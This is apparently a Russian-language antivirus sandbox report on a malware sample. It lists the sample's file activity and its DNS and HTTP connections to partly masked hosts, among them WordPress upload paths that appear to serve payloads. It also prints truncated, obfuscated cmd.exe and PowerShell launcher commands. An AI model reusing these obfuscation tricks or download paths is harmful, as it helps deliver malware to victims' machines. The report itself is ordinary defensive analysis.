Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c CmD.EXE /c"sEt Yfv= ( -JoIN[rEgex]::mAtChes( ")'x'+]43[emOHSp$+]4[EmoHSP$ (. ^|)43]rahc[,'Hjt' ecALpEr-421]rahc[,'X3q' ecALpEr- 63]rahc[,)98]rahc[+201]rahc[+89]rahc[(ecALpEr- 93]rahc[,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\90.exe
Удаляет следующие файлы
- %TEMP%\90.exe
Сетевая активность
Подключается к
- 'my###now.com':80
- 'sp###rich.com':80
- 'tu#####reseguros.org.br':80
- 'en#.edu.br':80
- 'en#.edu.br':443
TCP
Запросы HTTP GET
- http://www.my###now.com/oldsite/P
- http://www.my###now.com/packers-dec-6-denver-broncos-right/
- http://sp###rich.com/hgTHxN
- http://www.tu#####reseguros.org.br/wp-content/_uploads/4uehh8m
- http://en#.edu.br/wp-content/_uploads/4uehh8m
Другие
- 'en#.edu.br':443
UDP
- DNS ASK my###now.com
- DNS ASK sp###rich.com
- DNS ASK pr#####container.com
- DNS ASK tu#####reseguros.org.br
- DNS ASK en#.edu.br
- DNS ASK ka####-service.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c CmD.EXE /c"sEt Yfv= ( -JoIN[rEgex]::mAtChes( ")'x'+]43[emOHSp$+]4[EmoHSP$ (. ^|)43]rahc[,'Hjt' ecALpEr-421]rahc[,'X3q' ecALpEr- 63]rahc[,)98]rahc[+201]rahc[+89]rahc[(ecALpEr- 93]rahc[,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c"sEt Yfv= ( -JoIN[rEgex]::mAtChes( ")'x'+]43[emOHSp$+]4[EmoHSP$ (. |)43]rahc[,'Hjt' ecALpEr-421]rahc[,'X3q' ecALpEr- 63]rahc[,)98]rahc[+201]rahc[+89]rahc[(ecALpEr- 93]rahc[,'7of' ecALpEr...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( & ( \"{1}{0}\"-f 'ir','D' ) ( \"{0}{1}\" -f 'eNv:y','fv' )).\"v`ALUE\" | . ( ${s`H`ELliD}[1]+${s`HELL`id}[13] + 'x')
